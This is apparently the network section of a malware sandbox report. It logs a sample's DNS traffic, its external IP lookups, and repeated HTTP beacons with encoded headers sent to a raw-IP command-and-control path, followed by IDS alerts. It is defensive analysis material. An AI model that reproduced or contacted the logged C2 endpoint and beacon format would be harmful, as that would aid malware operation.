Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| checkip.amazonaws.com | 52.19.9.35 | |
| ip-api.com | 208.95.112.1 |
- UDP Requests
-
-
192.168.56.101:55871 164.124.101.2:53
-
192.168.56.101:57609 164.124.101.2:53
-
192.168.56.101:60131 164.124.101.2:53
-
192.168.56.101:61681 164.124.101.2:53
-
192.168.56.101:62062 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:61684 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://checkip.amazonaws.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: checkip.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:12:44 GMT
Server: lighttpd/1.4.53
Content-Length: 16
Connection: keep-alive
GET
200
http://ip-api.com/json/175.208.134.150
REQUEST
RESPONSE
BODY
GET /json/175.208.134.150 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:12:43 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 271
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET
200
http://checkip.amazonaws.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: checkip.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:13:12 GMT
Server: lighttpd/1.4.53
Content-Length: 16
Connection: keep-alive
GET
200
http://ip-api.com/json/175.208.134.150
REQUEST
RESPONSE
BODY
GET /json/175.208.134.150 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:13:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 271
Access-Control-Allow-Origin: *
X-Ttl: 31
X-Rl: 43
GET
200
http://5.188.119.76/updhdl?method=get
REQUEST
RESPONSE
BODY
GET /updhdl?method=get HTTP/1.1
tail: oE//yx1laZBxrph/O8pYH/+3x8msWjl9n+mpvOu0tj9WY0ZpnPcjqPdqTKxgpq4p
ua: bYUujve5vug9ACbT6Ossqqs5iTyZ9vXAQztNH7TZUKLwjNeLDGw7GJBGPwrDikvfage1YU9mvUk6vakl0060ZcDzSE3Q57ndYkqfIE+H/Wm9Ddhbp25qDLzh+I6xvMc7F6M2I/2Uk1OgB+z+xX5u7hOKLIbvVu8bmvK6Q77Uzjk0YBNfUr53M7oN2PEuY999VaJG60vJYYI7SVYFPSNZNBWOSzPRUVYykdQRqOEPfHWomy6N8UcNHoT8sgKoLbyzf9/0QmfgHrRJZ/xSEQyICAMDpBrvLN8zA228/FBP548t6QEeXn0mMRUfZpXm0HQpOVwKoMjAb2/nV+38Vlz2TjkXDAhQe9xlWdFs2VJYzVCY2b0i7tKgWjPc0uKrDJOHM4o/yYt/qxNZWnZXcc0O2JFHJfB4eq5nLbS3O5Qm6jh2FwWFT+95L27qGDqJELLSJp8FZtDpEpHhvBLACKa/MHjy9OBxodu8eICUFN5Ly0M=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 5.188.119.76
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:13:17 GMT
Content-Length: 16
Content-Type: application/octet-stream
GET
200
http://5.188.119.76/updhdl?method=get
REQUEST
RESPONSE
BODY
GET /updhdl?method=get HTTP/1.1
tail: iwhPS9w8eiN9lctJ1gpvvihQJEkvdf1XZwax4t6qeiUBXZkZXwoat+St/eKN88iN
ua: bYUujve5vug9ACbT6Ossqqs5iTyZ9vXAQztNH7TZUKLwjNeLDGw7GJBGPwrDikvfage1YU9mvUk6vakl0060ZcDzSE3Q57ndYkqfIE+H/Wm9Ddhbp25qDLzh+I6xvMc7F6M2I/2Uk1OgB+z+xX5u7hOKLIbvVu8bmvK6Q77Uzjk0YBNfUr53M7oN2PEuY999VaJG60vJYYI7SVYFPSNZNBWOSzPRUVYykdQRqOEPfHWomy6N8UcNHoT8sgKoLbyzf9/0QmfgHrRJZ/xSEQyICAMDpBrvLN8zA228/FBP548t6QEeXn0mMRUfZpXm0HQpOVwKoMjAb2/nV+38Vlz2TjkXDAhQe9xlWdFs2VJYzVCY2b0i7tKgWjPc0uKrDJOHM4o/yYt/qxNZWnZXcc0O2JFHJfB4eq5nLbS3O5Qm6jhUmk+zVp4gmnfmgk/jlR+ofzta/zH2TPVe6YBj/s/EsspHowT2R66C90YS+G272dw=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 5.188.119.76
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:14:17 GMT
Content-Length: 16
Content-Type: application/octet-stream
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49167 -> 208.95.112.1:80 | 2022082 | ET POLICY External IP Lookup ip-api.com | Device Retrieving External IP Address Detected |
| TCP 192.168.56.101:49176 -> 208.95.112.1:80 | 2022082 | ET POLICY External IP Lookup ip-api.com | Device Retrieving External IP Address Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts